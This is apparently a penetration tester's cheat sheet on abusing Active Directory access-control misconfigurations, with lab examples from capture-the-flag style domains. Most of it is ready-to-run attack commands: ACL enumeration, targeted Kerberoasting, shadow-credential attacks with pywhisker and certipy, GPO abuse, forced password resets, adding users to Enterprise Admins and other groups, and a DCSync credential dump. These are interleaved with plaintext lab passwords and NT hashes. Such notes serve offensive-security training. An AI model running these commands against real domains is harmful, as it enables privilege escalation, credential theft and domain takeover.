AD Object Security Permissions
- Everything is an Object (User, Group,Computers) with set of access permissions.
- If misconfigured, could lead to Privilege Escalation or Lateral Movement.
Manual Enumeration
Import-Module ./PowerView.ps1
Get-ObjectAcl -Identity $OwnUser | more
Things to look for:
- ActiveDirectoryRights
- SecurityIdentifier
- AceType
Read it like this Acetype of SecurityIdentifier had ActiveDirectoryRights on $OwnUser.
ConvertFrom-SID $SIDIdentifier
Get-ObjectAcl -Identity offsec -ResolveGUIDs | Foreach-Object {$_ | Add-
Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID
$_.SecurityIdentifier.value) -Force; $_}
enumeration for current user on other user
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-
Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID
$_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq
$("$env:UserDomain\$env:Username")) {$_}}
enumeration for current user on other groups
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-
Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID
$_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq
$("$env:UserDomain\$env:Username")) {$_}}
- GenericAll
- WriteDacl
- Look below for the steps
Bloodhound Enumeration and Exploit
GenericWrite
Generic all, Extend all rights, Forcechange password on User Account and Group
- User
net user testserviec password /domain
- Group
net group testgroup offsec /add /domain
RDP
mstsc /v:appsrv01 /prompt
Better use shadow credentials attack below
Write DACL
Grants permission to DACL itself.
Add-DomainObjectACL -TargetIdentiy testservice2 -PrincipalIdentity offsec -Rights All
Generic write on a Machine Account
The GenericWrite Property on a machine can give us many possibilities to attack a machine.
msDS-AllowedToActOnBehalfOfOtherIdentity
As we have generic write over the machine we can change its attribute msDS-AllowedToActOnBehalfOfOtherIdentity and give all rights to the attacker controlled spn.
and then perform RBCD.
Resource Based Constrained Delegation
Change password (works on 2008 and earlier)
net rpc password 'ADMWS01$' Password123! -U retro2.vl/'fs01$'%'Password123!' -S BLN01.retro2.vl
Generic Write on a User Account
Targeted Kerberoasting
This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operator group usually has those permissions.
The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.
From UNIX-like systems, this can be done with targetedKerberoast.py
targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD
Once the Kerberoast hash is obtained, it can possibly be cracked to recover the account’s password if the password used is weak enough.
Shadow Credentials attack (AddKeyCredentialLink)
- The basis of the “shadow credentials” attack is that if a user can write to
msDS-KeyCredentiallinkattribute on a user or computer object, he can obtain a TGT for that principal and then perform Kerberos authentication as that account using PKINIT. - Detailed Information on this account can be found on Elad Shamir’s blog on Medium.
- Requires windows server 2016 and later.
To perform this attack from a Linux system we need pyWhisker.py script. https://thehacker.recipes/ad/movement/kerberos/pass-the-certificate https://github.com/ShutdownRepo/pywhisker?tab=readme-ov-file
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add" -e pem
pull 1204 mist setup impacket
./pywhisker.py -d "mist.htb" -u "svc_ca$" -H 132af7136478f26a1b227d08a508a526 --target "svc_cabackup" --action "add" -e pfx
For machine account
python3 pywhisker.py -d "eu.junon.vl" -u "svc_backup" -p 'b4ckup5821!' --target "S021M200$" --action "add" -e pfx
Once the values are generated and added by pyWhisker, a TGT can be request with gettgtpkinit.py. The NT hash can then be recovered with getnthash.py
python3 PKINITtools/gettgtpkinit.py -cert-pem test2_cert.pem -key-pem test2_priv.pem domain.local/user2 user2.ccache
python3 PKINITtools/getnthash.py -key 894fde81fb7cf87963e4bda9e9e288536a0508a1553f15fdf24731731cecad16 domain.local/user2
Using certipy
certipy cert -pfx LxLvZ6SN.pfx -password fc3Am4EXoCY2hKxV3ZBe -export -out svc_cabackup.pfx
certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100 -username MS01 (Target account on which we added) -domain mist.htb
Domain Admins Owns Enterprise Admins
- Sliver C2 Commands
User in a group own other group so giving itself permission to write members in the group
sharpview Add-DomainObjectAcl -TargetIdentity \"Enterprise Admins\" -Rights WriteMembers -PrincipalIdentity tina
Adding itself in the member
sharpview Add-DomainGroupMember -Identity \"Enterprise Admins\" -Members tina
Verifying if it worked
sharpview Get-DomainGroupMember -Identity \"Enterprise Admins\"
WriteDacl
- A user is in a group which has writedacl on a group member
User in a group(legacy) has writedacl so giving itself all permission for that user GPOADM
sharpview Add-DomainObjectAcl -TargetIdentity GPOADM -Rights All -PrincipalIdentity legacy
shell
Set-ADAccountPassword -Identity 'CN=GPOADM,OU=GPO-MANAGEMENT,DC=BABY2,DC=VL' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Lacure77#" -Force)
Modifying the rights
To abuse WriteDacl to a group object, you may grant yourself the AddMember privilege.
Impacket’s dacledit can be used for that purpose (cf. “grant rights” reference for the link).
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'
GPO Abuse
- the Use GPOADM has generic all on Default domain controllers Policy
- We know the password of GPOADM
- use cyberchef to convert the password into ntlm
- get the gpo-id
sharpview Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
or use blood hound we need CN name
python3 pygpoabuse.py 'baby2.vl/gpoadm' -hashes f2942fef44f5dac6cd9bf544cba0c6c1:f2942fef44f5dac6cd9bf544cba0c6c1 -gpo-id "6AC1786C-016F-11D2-945F-00C04fB984F9" -f
gpupdate /force
net localgroup administrators
evil-winrm -i dc.baby2.vl -u john -p 'H4x00r123..'
ForceChangePassword
If you have plain text password convert it into hash
pth-net rpc password "Nina" "newP@ssword2022" -U final.com/adminwebsvc%b0df1cb0819ca0b7d476d4c868175b94:b0df1cb0819ca0b7d476d4c868175b94 -S 172.16.225.181
AddAllowedToAct
Resource Based Constrained Delegation
ReadGMSAPassword
cme ldap 10.10.103.222 -u 'thomas.powell' -p 'Password123!' --gmsa
GenericAll on a Group
Add user to the group
net rpc group addmem "SERVERADMINS" "hd-fstewart" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"
pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"
Verify
net rpc group members "SERVERADMINS" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"
DCSYNC
proxychains -f /etc/proxychains4.conf secretsdump.py 'work.junon.vl/hd-fstewart:DEQ8mC2xxTzVNB@S021M005.work.junon.vl'